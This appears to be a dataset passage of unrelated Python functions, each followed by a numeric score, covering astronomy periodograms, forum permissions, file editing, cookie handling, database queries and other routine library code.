except ValueError:
LOGERROR('no finite periodogram values '
'for this mag series, skipping...')
return {'bestperiod':npnan,
'bestlspval':npnan,
'nbestpeaks':nbestpeaks,
'nbestinds':None,
'nbestlspvals':None,
'nbestperiods':None,
'lspvals':None,
'periods':None,
'durations':None,
'method':'bls',
'blsresult':None,
'blsmodel':None,
'kwargs':{'startp':startp,
'endp':endp,
'stepsize':stepsize,
'mintransitduration':mintransitduration,
'maxtransitduration':maxtransitduration,
'ndurations':ndurations,
'blsobjective':blsobjective,
'blsmethod':blsmethod,
'blsoversample':blsoversample,
'autofreq':autofreq,
'periodepsilon':periodepsilon,
'nbestpeaks':nbestpeaks,
'sigclip':sigclip,
'magsarefluxes':magsarefluxes}}
sortedlspind = npargsort(finlsp)[::-1]
sortedlspperiods = finperiods[sortedlspind]
sortedlspvals = finlsp[sortedlspind]
# now get the nbestpeaks
nbestperiods, nbestlspvals, nbestinds, peakcount = (
[finperiods[bestperiodind]],
[finlsp[bestperiodind]],
[bestperiodind],
1
)
prevperiod = sortedlspperiods[0]
# find the best nbestpeaks in the lsp and their periods
for period, lspval, ind in zip(sortedlspperiods,
sortedlspvals,
sortedlspind):
if peakcount == nbestpeaks:
break
perioddiff = abs(period - prevperiod)
bestperiodsdiff = [abs(period - x) for x in nbestperiods]
# this ensures that this period is different from the last
# period and from all the other existing best periods by
# periodepsilon to make sure we jump to an entire different
# peak in the periodogram
if (perioddiff > (periodepsilon*prevperiod) and
all(x > (periodepsilon*period)
for x in bestperiodsdiff)):
nbestperiods.append(period)
nbestlspvals.append(lspval)
nbestinds.append(ind)
peakcount = peakcount + 1
prevperiod = period
# generate the return dict
resultdict = {
'bestperiod':finperiods[bestperiodind],
'bestlspval':finlsp[bestperiodind],
'nbestpeaks':nbestpeaks,
'nbestinds':nbestinds,
'nbestlspvals':nbestlspvals,
'nbestperiods':nbestperiods,
'lspvals':lsp,
'frequencies':frequencies,
'periods':periods,
'durations':[x['durations'] for x in results],
'blsresult':[x['blsresult'] for x in results],
'blsmodel':[x['blsmodel'] for x in results],
'stepsize':stepsize,
'nfreq':nfreq,
'mintransitduration':mintransitduration,
'maxtransitduration':maxtransitduration,
'method':'bls',
'kwargs':{'startp':startp,
'endp':endp,
'stepsize':stepsize,
'mintransitduration':mintransitduration,
'maxtransitduration':maxtransitduration,
'ndurations':ndurations,
'blsobjective':blsobjective,
'blsmethod':blsmethod,
'blsoversample':blsoversample,
'autofreq':autofreq,
'periodepsilon':periodepsilon,
'nbestpeaks':nbestpeaks,
'sigclip':sigclip,
'magsarefluxes':magsarefluxes}
}
return resultdict
else:
LOGERROR('no good detections for these times and mags, skipping...')
return {'bestperiod':npnan,
'bestlspval':npnan,
'nbestinds':None,
'nbestpeaks':nbestpeaks,
'nbestlspvals':None,
'nbestperiods':None,
'lspvals':None,
'periods':None,
'durations':None,
'blsresult':None,
'blsmodel':None,
'stepsize':stepsize,
'nfreq':None,
'nphasebins':None,
'mintransitduration':mintransitduration,
'maxtransitduration':maxtransitduration,
'method':'bls',
'kwargs':{'startp':startp,
'endp':endp,
'stepsize':stepsize,
'mintransitduration':mintransitduration,
'maxtransitduration':maxtransitduration,
'ndurations':ndurations,
'blsobjective':blsobjective,
'blsmethod':blsmethod,
'blsoversample':blsoversample,
'autofreq':autofreq,
'periodepsilon':periodepsilon,
'nbestpeaks':nbestpeaks,
'sigclip':sigclip,
'magsarefluxes':magsarefluxes}} | 0.004924 |
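A hypothetical call sketch for the function above, assuming Astropy >= 3.1 and the rest of the module's imports are available; the synthetic light curve and its 3.5-day box transit are made up for illustration:
import numpy as np

rng = np.random.default_rng(42)
times = np.sort(rng.uniform(0.0, 90.0, 4000))           # 90 days of random sampling
mags = 12.0 + 0.002 * rng.standard_normal(times.size)   # flat 12th-mag baseline
in_transit = (times % 3.5) < (0.05 * 3.5)                # crude 5%-of-phase box transit
mags[in_transit] += 0.01                                 # 10 mmag dip (mags: larger = fainter)
errs = np.full_like(times, 0.002)

results = bls_parallel_pfind(times, mags, errs,
                             startp=1.0, endp=10.0,
                             nworkers=2, verbose=False)
print(results['bestperiod'])                             # should land near 3.5 d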
def can_subscribe_to_topic(self, topic, user):
""" Given a topic, checks whether the user can add it to their subscription list. """
# A user can subscribe to topics if they are authenticated and if they have the permission
# to read the related forum. Of course a user can subscribe only if they have not already
# subscribed to the considered topic.
return (
user.is_authenticated and
not topic.has_subscriber(user) and
self._perform_basic_permission_check(topic.forum, user, 'can_read_forum')
) | 0.010327 |
def example_exc_handler(tries_remaining, exception, delay):
"""Example exception handler; prints a warning to stderr.
tries_remaining: The number of tries remaining.
exception: The exception instance which was raised.
"""
print >> stderr, "Caught '{0}', {1} tries remaining, \
sleeping for {2} seconds".format(exception, tries_remaining, delay) | 0.002703 |
def fileset(self, name, from_study=None, format=None): # @ReservedAssignment @IgnorePep8
"""
Gets the fileset named 'name' produced by the Study named 'study' if
provided. If a spec is passed instead of a str to the name argument,
then the study will be set from the spec iff it is derived
Parameters
----------
name : str | FilesetSpec
The name of the fileset or a spec matching the given name
from_study : str | None
Name of the study that produced the fileset if derived. If None
and a spec is passed instead of a string to the name argument then
the study name will be taken from the spec instead.
format : FileFormat | str | None
Either the format of the fileset to return or the name of the
format. If None and only a single fileset is found for the given
name and study then that is returned otherwise an exception is
raised
"""
if isinstance(name, BaseFileset):
if from_study is None and name.derived:
from_study = name.study.name
name = name.name
try:
format_dct = self._filesets[(name, from_study)]
except KeyError:
available = [
('{}(format={})'.format(f.name, f._resource_name)
if f._resource_name is not None else f.name)
for f in self.filesets if f.from_study == from_study]
other_studies = [
(f.from_study if f.from_study is not None else '<root>')
for f in self.filesets if f.name == name]
if other_studies:
msg = (". NB: matching fileset(s) found for '{}' study(ies) "
"('{}')".format(name, "', '".join(other_studies)))
else:
msg = ''
raise ArcanaNameError(
name,
("{} doesn't have a fileset named '{}'{} "
"(available '{}'){}"
.format(self, name,
(" from study '{}'".format(from_study)
if from_study is not None else ''),
"', '".join(available), msg)))
else:
if format is None:
all_formats = list(format_dct.values())
if len(all_formats) > 1:
raise ArcanaNameError(
"Multiple filesets found for '{}'{} in {} with formats"
" {}. Need to specify a format"
.format(name, ("in '{}'".format(from_study)
if from_study is not None else ''),
self, "', '".join(format_dct.keys())))
fileset = all_formats[0]
else:
try:
if isinstance(format, str):
fileset = format_dct[format]
else:
try:
fileset = format_dct[format.ext]
except KeyError:
fileset = None
for rname, rfileset in format_dct.items():
if rname in format.resource_names(
self.tree.repository.type):
fileset = rfileset
break
if fileset is None:
raise
except KeyError:
raise ArcanaNameError(
format,
("{} doesn't have a fileset named '{}'{} with "
"format '{}' (available '{}'){}"
.format(self, name,
(" from study '{}'".format(from_study)
if from_study is not None else ''),
format,
"', '".join(format_dct.keys()), msg)))
return fileset | 0.001206 |
def start(st_reg_number):
"""Checks the number valiaty for the Alagoas state"""
if len(st_reg_number) > 9:
return False
if len(st_reg_number) < 9:
return False
if st_reg_number[0:2] != "24":
return False
if st_reg_number[2] not in ['0', '3', '5', '7', '8']:
return False
aux = 9
sum_total = 0
for i in range(len(st_reg_number)-1):
sum_total = sum_total + int(st_reg_number[i]) * aux
aux -= 1
product = sum_total * 10
aux_2 = int(product/11)
digit = product - aux_2 * 11
if digit == 10:
digit = 0
return digit == int(st_reg_number[len(st_reg_number)-1]) | 0.001493 |
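A worked example of the check-digit arithmetic above; the registration number is fabricated purely to exercise the rule:
# weights 9..2 over the first eight digits of '248010255':
#   2*9 + 4*8 + 8*7 + 0*6 + 1*5 + 0*4 + 2*3 + 5*2 = 127
#   127 * 10 = 1270;  1270 - (1270 // 11) * 11 = 5  -> expected check digit 5
print(start('248010255'))  # True  (last digit matches the computed 5)
print(start('248010254'))  # False (check digit mismatch)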
def motion_detection_sensitivity(self):
"""Sensitivity level of Camera motion detection."""
if not self.triggers:
return None
for trigger in self.triggers:
if trigger.get("type") != "pirMotionActive":
continue
sensitivity = trigger.get("sensitivity")
if sensitivity:
return sensitivity.get("default")
return None | 0.004684 |
def dumps(value):
"""
Dumps a data structure to TOML source code.
The given value must be a TOMLFile instance, as produced by this module's load() or loads().
"""
from contoml.file.file import TOMLFile
if not isinstance(value, TOMLFile):
raise RuntimeError("Can only dump a TOMLFile instance loaded by load() or loads()")
return value.dumps() | 0.007614 |
def createJSON(g, full=True):
"""
Create JSON compatible dictionary from current settings
Parameters
----------
g : hcam_drivers.globals.Container
Container with globals
"""
data = dict()
if 'gps_attached' not in g.cpars:
data['gps_attached'] = 1
else:
data['gps_attached'] = 1 if g.cpars['gps_attached'] else 0
data['appdata'] = g.ipars.dumpJSON()
data['user'] = g.rpars.dumpJSON()
if full:
data['hardware'] = g.ccd_hw.dumpJSON()
data['tcs'] = g.info.dumpJSON()
if g.cpars['telins_name'].lower() == 'gtc' and has_corba:
try:
s = get_telescope_server()
data['gtc_headers'] = dict(
create_header_from_telpars(s.getTelescopeParams())
)
except Exception:
g.clog.warn('cannot get GTC headers from telescope server')
return data | 0.002174 |
def divide(elements, by, translate=False, sep=' '):
"""Divide lists `elements` and `by`.
All elements are grouped into N bins, where N is the number of elements in the `by` list.
Parameters
----------
elements: list of dict
Elements to be grouped into bins.
by: list of dict
Elements defining the bins.
translate: bool (default: False)
When dividing, also translate start and end positions of elements.
sep: str (default ' ')
In case of multispans, what is the default text separator.
This is required in order to tag correct start, end positions of elements.
"""
outer_spans = [spans(elem) for elem in by]
return divide_by_spans(elements, outer_spans, translate=translate, sep=sep) | 0.003958 |
def transform(self, y):
"""Transform labels to normalized encoding.
Parameters
----------
y : ArrayRDD [n_samples]
Target values.
Returns
-------
y : ArrayRDD [n_samples]
"""
mapper = super(SparkLabelEncoder, self).transform
mapper = self.broadcast(mapper, y.context)
return y.transform(mapper) | 0.005076 |
def fit_content(self, verbose=False):
"""
Zooms out the current view in order to display all of its elements.
:param verbose: print more
"""
PARAMS={}
response=api(url=self.__url+"/fit content", PARAMS=PARAMS, method="POST", verbose=verbose)
return response | 0.015873 |
def set_simulation_duration(self, simulation_duration):
"""
set the simulation_duration
see: http://www.gsshawiki.com/Project_File:Required_Inputs
"""
self.project_manager.setCard('TOT_TIME', str(simulation_duration.total_seconds()/60.0))
super(EventMode, self).set_simulation_duration(simulation_duration)
self.simulation_duration = simulation_duration | 0.007335 |
def node_filters(self):
""" Dict[str, NodeFilter]: Returns the node filters for this selector. """
return {
name: filter for name, filter in iter(self.filters.items())
if isinstance(filter, NodeFilter)} | 0.012346 |
def use_form(form_class, request=None, **top_kwargs):
"""
Validate request (query_params or request body with args from url) with serializer and pass
validated data dict to the view function instead of request object.
"""
def validated_form(request, **kwargs):
# import ipdb; ipdb.set_trace()
data = request.query_params.dict() if request.method in ['GET'] else request.data
if isinstance(data, QueryDict):
form = form_class(data={**data.dict(), **kwargs})
elif isinstance(data, dict):
form = form_class(data={**data, **kwargs})
else:
form = form_class(data=data, **kwargs)
form.is_valid(raise_exception=True)
return form
if request:
kwargs = {}
if request.resolver_match:
kwargs = {**request.resolver_match.kwargs}
if top_kwargs:
kwargs = {**kwargs, **top_kwargs}
return validated_form(request, **kwargs).validated_data
def wrap(func):
def method_wrap(view, request, *args, **kwargs):
form = validated_form(request, **kwargs)
if hasattr(view, 'log'):
form.log = view.log
return func(view, form.validated_data, *args, **kwargs)
def function_wrap(request, *args, **kwargs):
form = validated_form(request, **kwargs)
return func(form.validated_data, *args, **kwargs)
def inner(*args, **kwargs):
is_method = isinstance(args[0], APIView)
return (method_wrap if is_method else function_wrap)(*args, **kwargs)
return inner
return wrap | 0.002429 |
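A hypothetical Django REST framework usage sketch for the decorator above; the serializer and view names are made up, and the decorated method receives the validated dict instead of the request:
from rest_framework import serializers
from rest_framework.response import Response
from rest_framework.views import APIView

class ItemQueryForm(serializers.Serializer):
    q = serializers.CharField()
    page = serializers.IntegerField(default=1)

class ItemSearchView(APIView):
    @use_form(ItemQueryForm)
    def get(self, data, *args, **kwargs):
        # 'data' is ItemQueryForm.validated_data, not the request object
        return Response({'query': data['q'], 'page': data['page']})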
def publish_active_scene(self, scene_id):
"""publish changed active scene"""
self.sequence_number += 1
self.publisher.send_multipart(msgs.MessageBuilder.scene_active(self.sequence_number, scene_id))
return self.sequence_number | 0.011628 |
def _updateEmissionProbabilities(self):
"""Sample a new set of emission probabilites from the conditional distribution P(E | S, O)
"""
observations_by_state = [self.model.collect_observations_in_state(self.observations, state)
for state in range(self.model.nstates)]
self.model.output_model.sample(observations_by_state) | 0.010363 |
def delete(self, template_id, session):
'''taobao.delivery.template.delete - delete a shipping-fee template
Deletes the template identified by the user-specified template ID.'''
request = TOPRequest('taobao.delivery.template.delete')
request['template_id'] = template_id
self.create(self.execute(request, session), fields=['complete', ])
return self.complete | 0.008798 |
def generate_random_string(template_dict, key='start'):
"""Generates a random excuse from a simple template dict.
Based off of drow's generator.js (public domain).
Grok it here: http://donjon.bin.sh/code/random/generator.js
Args:
template_dict: Dict with template strings.
key: String with the starting index for the dict. (Default: 'start')
Returns:
Generated string.
"""
data = template_dict.get(key)
#if isinstance(data, list):
result = random.choice(data)
#else:
#result = random.choice(data.values())
for match in token_regex.findall(result):
word = generate_random_string(template_dict, match) or match
result = result.replace('{{{0}}}'.format(match), word)
return result | 0.00641 |
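A self-contained usage sketch; `token_regex` is referenced but not defined in the snippet, so the pattern below is an assumption about what it looks like, and the template content is made up:
import random
import re

token_regex = re.compile(r'\{(\w+)\}')  # assumed module-level pattern

template_dict = {
    'start': ['My {pet} ate my {thing}.', 'The {pet} deleted my {thing}.'],
    'pet': ['dog', 'cat', 'ferret'],
    'thing': ['homework', 'commit history'],
}
print(generate_random_string(template_dict))
# e.g. "The cat deleted my commit history."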
def _run(self):
"""Run method that can be profiled"""
self.set_state(self.STATE_INITIALIZING)
self.ioloop = ioloop.IOLoop.current()
self.consumer_lock = locks.Lock()
self.sentry_client = self.setup_sentry(
self._kwargs['config'], self.consumer_name)
try:
self.setup()
except (AttributeError, ImportError):
return self.on_startup_error(
'Failed to import the Python module for {}'.format(
self.consumer_name))
if not self.is_stopped:
try:
self.ioloop.start()
except KeyboardInterrupt:
LOGGER.warning('CTRL-C while waiting for clean shutdown') | 0.002717 |
def QA_SU_save_etf_list(client=DATABASE, ui_log=None, ui_progress=None):
"""save etf_list
Keyword Arguments:
client {[type]} -- [description] (default: {DATABASE})
"""
try:
QA_util_log_info(
'##JOB16 Now Saving ETF_LIST ====',
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=5000
)
etf_list_from_tdx = QA_fetch_get_stock_list(type_="etf")
pandas_data = QA_util_to_json_from_pandas(etf_list_from_tdx)
if len(pandas_data) > 0:
# only drop the collection after data has actually been fetched
client.drop_collection('etf_list')
coll = client.etf_list
coll.create_index('code')
coll.insert_many(pandas_data)
QA_util_log_info(
"完成ETF列表获取",
ui_log=ui_log,
ui_progress=ui_progress,
ui_progress_int_value=10000
)
except Exception as e:
QA_util_log_info(e, ui_log=ui_log)
print(" Error save_tdx.QA_SU_save_etf_list exception!")
pass | 0.000936 |
def consume_keys_asynchronous_threads(self):
"""
Work through the keys to look up asynchronously using multiple threads
"""
print("\nLooking up " + self.input_queue.qsize().__str__() + " keys from " + self.source_name + "\n")
jobs = multiprocessing.cpu_count()*4 if (multiprocessing.cpu_count()*4 < self.input_queue.qsize()) \
else self.input_queue.qsize()
pool = ThreadPool(jobs)
for x in range(jobs):
pool.apply(self.data_worker, [], self.worker_args)
pool.close()
pool.join() | 0.006932 |
def enumerate_keyword_args(tokens):
"""
Iterates over *tokens* and returns a dictionary with function names as the
keys and lists of keyword arguments as the values.
"""
keyword_args = {}
inside_function = False
for index, tok in enumerate(tokens):
token_type = tok[0]
token_string = tok[1]
if token_type == tokenize.NEWLINE:
inside_function = False
if token_type == tokenize.NAME:
if token_string == "def":
function_name = tokens[index+1][1]
inside_function = function_name
keyword_args.update({function_name: []})
elif inside_function:
if tokens[index+1][1] == '=': # keyword argument
keyword_args[function_name].append(token_string)
return keyword_args | 0.002384 |
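A standalone Python 3 usage sketch, tokenizing a tiny source string and assuming the function above is in scope:
import io
import tokenize

source = (
    "def connect(host, port=5432, timeout=10):\n"
    "    pass\n"
)
tokens = list(tokenize.generate_tokens(io.StringIO(source).readline))
print(enumerate_keyword_args(tokens))
# {'connect': ['port', 'timeout']}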
def create(cls, **kwargs):
"""Initializes a new instance, adds it to the db and commits
the transaction.
Args:
**kwargs: The keyword arguments for the init constructor.
Examples:
>>> user = User.create(name="Vicky", email="[email protected]")
>>> user.id
35
"""
try:
return cls.add(cls.new(**kwargs))
except:
cls.session.rollback()
raise | 0.006316 |
def avg_pool(arr, block_size, cval=0, preserve_dtype=True):
"""
Resize an array using average pooling.
dtype support::
See :func:`imgaug.imgaug.pool`.
Parameters
----------
arr : (H,W) ndarray or (H,W,C) ndarray
Image-like array to pool. See :func:`imgaug.pool` for details.
block_size : int or tuple of int or tuple of int
Size of each block of values to pool. See :func:`imgaug.pool` for details.
cval : number, optional
Padding value. See :func:`imgaug.pool` for details.
preserve_dtype : bool, optional
Whether to preserve the input array dtype. See :func:`imgaug.pool` for details.
Returns
-------
arr_reduced : (H',W') ndarray or (H',W',C') ndarray
Array after average pooling.
"""
return pool(arr, block_size, np.average, cval=cval, preserve_dtype=preserve_dtype) | 0.004535 |
def psed(path,
before,
after,
limit='',
backup='.bak',
flags='gMS',
escape_all=False,
multi=False):
'''
.. deprecated:: 0.17.0
Use :py:func:`~salt.modules.file.replace` instead.
Make a simple edit to a file (pure Python version)
Equivalent to:
.. code-block:: bash
sed <backup> <options> "/<limit>/ s/<before>/<after>/<flags> <file>"
path
The full path to the file to be edited
before
A pattern to find in order to replace with ``after``
after
Text that will replace ``before``
limit : ``''``
An initial pattern to search for before searching for ``before``
backup : ``.bak``
The file will be backed up before edit with this file extension;
**WARNING:** each time ``sed``/``comment``/``uncomment`` is called will
overwrite this backup
flags : ``gMS``
Flags to modify the search. Valid values are:
- ``g``: Replace all occurrences of the pattern, not just the first.
- ``I``: Ignore case.
- ``L``: Make ``\\w``, ``\\W``, ``\\b``, ``\\B``, ``\\s`` and ``\\S``
dependent on the locale.
- ``M``: Treat multiple lines as a single line.
- ``S``: Make `.` match all characters, including newlines.
- ``U``: Make ``\\w``, ``\\W``, ``\\b``, ``\\B``, ``\\d``, ``\\D``,
``\\s`` and ``\\S`` dependent on Unicode.
- ``X``: Verbose (whitespace is ignored).
multi: ``False``
If True, treat the entire file as a single line
Forward slashes and single quotes will be escaped automatically in the
``before`` and ``after`` patterns.
CLI Example:
.. code-block:: bash
salt '*' file.sed /etc/httpd/httpd.conf 'LogLevel warn' 'LogLevel info'
'''
# Largely inspired by Fabric's contrib.files.sed()
# XXX:dc: Do we really want to always force escaping?
#
# Mandate that before and after are strings
path = os.path.expanduser(path)
multi = bool(multi)
before = six.text_type(before)
after = six.text_type(after)
before = _sed_esc(before, escape_all)
# The pattern to replace with does not need to be escaped!!!
# after = _sed_esc(after, escape_all)
limit = _sed_esc(limit, escape_all)
shutil.copy2(path, '{0}{1}'.format(path, backup))
with salt.utils.files.fopen(path, 'w') as ofile:
with salt.utils.files.fopen('{0}{1}'.format(path, backup), 'r') as ifile:
if multi is True:
for line in ifile.readline():
ofile.write(
salt.utils.stringutils.to_str(
_psed(
salt.utils.stringutils.to_unicode(line),
before,
after,
limit,
flags
)
)
)
else:
ofile.write(
salt.utils.stringutils.to_str(
_psed(
salt.utils.stringutils.to_unicode(ifile.read()),
before,
after,
limit,
flags
)
)
) | 0.00058 |
def enurlform_app(parser, cmd, args): # pragma: no cover
"""
encode a series of key=value pairs into a query string.
"""
parser.add_argument('values', help='the key=value pairs to URL encode', nargs='+')
args = parser.parse_args(args)
return enurlform(dict(v.split('=', 1) for v in args.values)) | 0.006231 |
def list_subscription(self):
'''**Description**
List all subscriptions
**Arguments**
- None
**Success Return Value**
A JSON object representing the list of subscriptions.
'''
url = self.url + "/api/scanning/v1/anchore/subscriptions"
res = requests.get(url, headers=self.hdrs, verify=self.ssl_verify)
if not self._checkResponse(res):
return [False, self.lasterr]
return [True, res.json()] | 0.003984 |
def dispatch(self):
"""Dispatch http request to registerd commands.
Example::
slack = Slack(app)
app.add_url_rule('/', view_func=slack.dispatch)
"""
from flask import request
method = request.method
data = request.args
if method == 'POST':
data = request.form
token = data.get('token')
team_id = data.get('team_id')
command = data.get('command') or data.get('trigger_word')
if isinstance(command, string_types):
command = command.strip().lstrip('/')
try:
self.validate(command, token, team_id, method)
except SlackError as e:
return self.response(e.msg)
func, _, _, kwargs = self._commands[(team_id, command)]
kwargs.update(data.to_dict())
return func(**kwargs) | 0.002301 |
def get_webpack(request, name='DEFAULT'):
"""
Get the Webpack object for a given webpack config.
Called at most once per request per config name.
"""
if not hasattr(request, '_webpack_map'):
request._webpack_map = {}
wp = request._webpack_map.get(name)
if wp is None:
wp = request._webpack_map[name] = Webpack(request, name)
return wp | 0.002611 |
def do_init_cached_fields(self):
"""
Initialize each fields of the fields_desc dict, or use the cached
fields information
"""
cls_name = self.__class__
# Build the fields information
if Packet.class_default_fields.get(cls_name, None) is None:
self.prepare_cached_fields(self.fields_desc)
# Use fields information from cache
if not Packet.class_default_fields.get(cls_name, None) is None:
self.default_fields = Packet.class_default_fields[cls_name]
self.fieldtype = Packet.class_fieldtype[cls_name]
self.packetfields = Packet.class_packetfields[cls_name]
# Deepcopy default references
for fname in Packet.class_default_fields_ref[cls_name]:
value = copy.deepcopy(self.default_fields[fname])
setattr(self, fname, value) | 0.00223 |
def _epsilon_closure(self, state):
"""
Returns the \epsilon-closure for the state given as input.
"""
closure = set([state.stateid])
stack = [state]
while True:
if not stack:
break
s = stack.pop()
for arc in s:
if self.isyms.find(arc.ilabel) != EPSILON or \
arc.nextstate in closure:
continue
closure.add(arc.nextstate)
stack.append(self.states[arc.nextstate])
return closure | 0.005217 |
def bind_to_uniform_block(self, binding=0, *, offset=0, size=-1) -> None:
'''
Bind the buffer to a uniform block.
Args:
binding (int): The uniform block binding.
Keyword Args:
offset (int): The offset.
size (int): The size. Value ``-1`` means all.
'''
self.mglo.bind_to_uniform_block(binding, offset, size) | 0.004796 |
def predecessors(self, node, exclude_compressed=True):
"""
Returns the list of predecessors of a given node
Parameters
----------
node : str
The target node
exclude_compressed : boolean
If true, compressed nodes are excluded from the predecessors list
Returns
-------
list
List of predecessors nodes
"""
preds = super(Graph, self).predecessors(node)
if exclude_compressed:
return [n for n in preds if not self.node[n].get('compressed', False)]
else:
return preds | 0.004769 |
def neighbors(self) -> List['Node']:
"""
The list of neighbors of the node.
"""
self._load_neighbors()
return [edge.source if edge.source != self else edge.target
for edge in self._neighbors.values()] | 0.007634 |
def go_to_py_cookie(go_cookie):
'''Convert a Go-style JSON-unmarshaled cookie into a Python cookie'''
expires = None
if go_cookie.get('Expires') is not None:
t = pyrfc3339.parse(go_cookie['Expires'])
expires = t.timestamp()
return cookiejar.Cookie(
version=0,
name=go_cookie['Name'],
value=go_cookie['Value'],
port=None,
port_specified=False,
# Unfortunately Python cookies don't record the original
# host that the cookie came from, so we'll just use Domain
# for that purpose, and record that the domain was specified,
# even though it probably was not. This means that
# we won't correctly record the CanonicalHost entry
# when writing the cookie file after reading it.
domain=go_cookie['Domain'],
domain_specified=not go_cookie['HostOnly'],
domain_initial_dot=False,
path=go_cookie['Path'],
path_specified=True,
secure=go_cookie['Secure'],
expires=expires,
discard=False,
comment=None,
comment_url=None,
rest=None,
rfc2109=False,
) | 0.000866 |
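A usage sketch with a made-up cookie dict, assuming `pyrfc3339` is installed and the function above is in scope:
go_cookie = {
    'Name': 'macaroon-auth',
    'Value': 'abc123',
    'Domain': 'api.example.com',
    'HostOnly': True,
    'Path': '/',
    'Secure': True,
    'Expires': '2030-01-01T00:00:00Z',
}
cookie = go_to_py_cookie(go_cookie)
print(cookie.name, cookie.domain, cookie.secure)  # macaroon-auth api.example.com True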
def _add_to_checksum(self, checksum, value):
"""Add a byte to the checksum."""
checksum = self._byte_rot_left(checksum, 1)
checksum = checksum + value
if (checksum > 255):
checksum = checksum - 255
self._debug(PROP_LOGLEVEL_TRACE, "C: " + str(checksum) + " V: " + str(value))
return checksum | 0.008547 |
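The helper _byte_rot_left is not shown in this snippet; a minimal sketch of an 8-bit circular left rotation (an assumption about what that helper does) looks like this.
def byte_rot_left(value, count):
    # Assumed 8-bit rotate-left; the real _byte_rot_left may differ.
    count %= 8
    return ((value << count) | (value >> (8 - count))) & 0xFF

print(bin(byte_rot_left(0b10000001, 1)))   # 0b11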
def list_files(dirname, extension=None):
"""
List all files in directory `dirname`, option to filter on file extension
"""
f = []
for (dirpath, dirnames, filenames) in os.walk(dirname):
f.extend(filenames)
break
if extension is not None:
# Filter on extension
filtered = []
for filename in f:
fn, ext = os.path.splitext(filename)
if ext.lower() == '.' + extension.lower():
filtered.append(filename)
f = filtered
return f | 0.001866 |
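A standalone sketch of the same top-level-only listing and extension filter; the directory and extension below are arbitrary.
import os

def list_files_demo(dirname, extension=None):
    # Only the first os.walk() entry is used, i.e. files directly in dirname.
    for _, _, filenames in os.walk(dirname):
        if extension is None:
            return filenames
        return [f for f in filenames
                if os.path.splitext(f)[1].lower() == '.' + extension.lower()]
    return []

print(list_files_demo('.', extension='py'))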
def _remove_processed_data(
self):
"""*remove processed data*
"""
self.log.info('starting the ``_remove_processed_data`` method')
archivePath = self.settings["atlas archive path"]
from fundamentals.mysql import readquery
sqlQuery = u"""
select mjd from (SELECT DISTINCT
FLOOR(mjd) as mjd
FROM
atlas_exposures
WHERE
local_data = 1 AND dophot_match > 0) as a
where mjd NOT IN (SELECT
*
FROM
(SELECT DISTINCT
FLOOR(mjd)
FROM
atlas_exposures
WHERE
local_data = 1 AND dophot_match = 0) AS a);
""" % locals()
mjds = readquery(
log=self.log,
sqlQuery=sqlQuery,
dbConn=self.atlasMoversDBConn
)
if not len(mjds):
return None
oldMjds = []
oldMjds[:] = [str(int(o["mjd"])) for o in mjds]
for m in oldMjds:
for i in ["01a", "02a"]:
datapath = archivePath + "/%(i)s/%(m)s" % locals()
# shutil.rmtree(datapath)
try:
shutil.rmtree(datapath)
except:
self.log.warning(
"The path %(datapath)s does not exist - no need to delete" % locals())
mjdString = (',').join(oldMjds)
sqlQuery = """
update day_tracker set local_data = 0 where floor(mjd) in (%(mjdString)s);
update atlas_exposures set local_data = 0 where floor(mjd) in (%(mjdString)s) and dophot_match != 0;""" % locals(
)
        print(sqlQuery)
writequery(
log=self.log,
sqlQuery=sqlQuery,
dbConn=self.atlasMoversDBConn
)
self.log.info('completed the ``_remove_processed_data`` method')
return None | 0.003193 |
def delete_api_key(awsclient, api_key):
"""Remove API key.
:param api_key:
"""
_sleep()
client_api = awsclient.get_client('apigateway')
print('delete api key: %s' % api_key)
response = client_api.delete_api_key(
apiKey=api_key
)
print(json2table(response)) | 0.0033 |
def crps(self):
"""
Calculates the continuous ranked probability score.
"""
return np.sum(self.errors["F_2"].values - self.errors["F_O"].values * 2.0 + self.errors["O_2"].values) / \
(self.thresholds.size * self.num_forecasts) | 0.011111 |
def add_filter(self, table, cols, condition):
"""
Add a filter. When reading *table*, rows in *table* will be
filtered by filter_rows().
Args:
table: The table the filter applies to.
cols: The columns in *table* to filter on.
condition: The filter function.
"""
if table is not None and table not in self.relations:
raise ItsdbError('Cannot add filter; table "{}" is not defined '
'by the relations file.'
.format(table))
# this is a hack, though perhaps well-motivated
if cols is None:
cols = [None]
self.filters[table].append((cols, condition)) | 0.002714 |
def _build_query(self, table, tree, visitor):
""" Build a scan/query from a statement """
kwargs = {}
index = None
if tree.using:
index_name = kwargs["index"] = tree.using[1]
index = table.get_index(index_name)
if tree.where:
constraints = ConstraintExpression.from_where(tree.where)
possible_hash = constraints.possible_hash_fields()
possible_range = constraints.possible_range_fields()
if index is None:
# See if we can find an index to query on
indexes = table.get_matching_indexes(possible_hash, possible_range)
if not indexes:
action = "scan"
kwargs["filter"] = constraints.build(visitor)
kwargs["expr_values"] = visitor.expression_values
kwargs["alias"] = visitor.attribute_names
elif len(indexes) == 1:
index = indexes[0]
action = "query"
add_query_kwargs(kwargs, visitor, constraints, index)
else:
names = ", ".join([index.name for index in indexes])
raise SyntaxError(
"No index specified with USING <index>, "
"but multiple possibilities for query: "
"%s" % names
)
else:
if index.hash_key in possible_hash:
action = "query"
add_query_kwargs(kwargs, visitor, constraints, index)
else:
action = "scan"
if not index.scannable:
raise SyntaxError("Cannot scan local index %r" % index_name)
kwargs["filter"] = constraints.build(visitor)
kwargs["expr_values"] = visitor.expression_values
kwargs["alias"] = visitor.attribute_names
else:
action = "scan"
return [action, kwargs, index] | 0.001918 |
def is_permitted_collective(self, permission_s, logical_operator=all):
"""
:param permission_s: a List of authz_abcs.Permission objects
:param logical_operator: indicates whether *all* or at least one
permission check is true, *any*
:type: any OR all (functions from python stdlib)
:returns: a Boolean
"""
sm = self.security_manager
if self.authorized:
return sm.is_permitted_collective(self.identifiers,
permission_s,
logical_operator)
msg = 'Cannot check permission when user isn\'t authenticated nor remembered'
raise ValueError(msg) | 0.003953 |
def block_stats(x,y,z,ds,stat='median',bins=None):
"""Compute points on a regular grid (matching input GDAL Dataset) from scattered point data using specified statistic
Wrapper for scipy.stats.binned_statistic_2d
    Note: this is very fast for mean, std, count, but significantly slower for median
"""
import scipy.stats as stats
extent = ds_extent(ds)
#[[xmin, xmax], [ymin, ymax]]
range = [[extent[0], extent[2]], [extent[1], extent[3]]]
if bins is None:
bins = (ds.RasterXSize, ds.RasterYSize)
if stat == 'max':
stat = np.max
elif stat == 'min':
stat = np.min
#block_count, xedges, yedges, bin = stats.binned_statistic_2d(x,y,z,'count',bins,range)
block_stat, xedges, yedges, bin = stats.binned_statistic_2d(x,y,z,stat,bins,range)
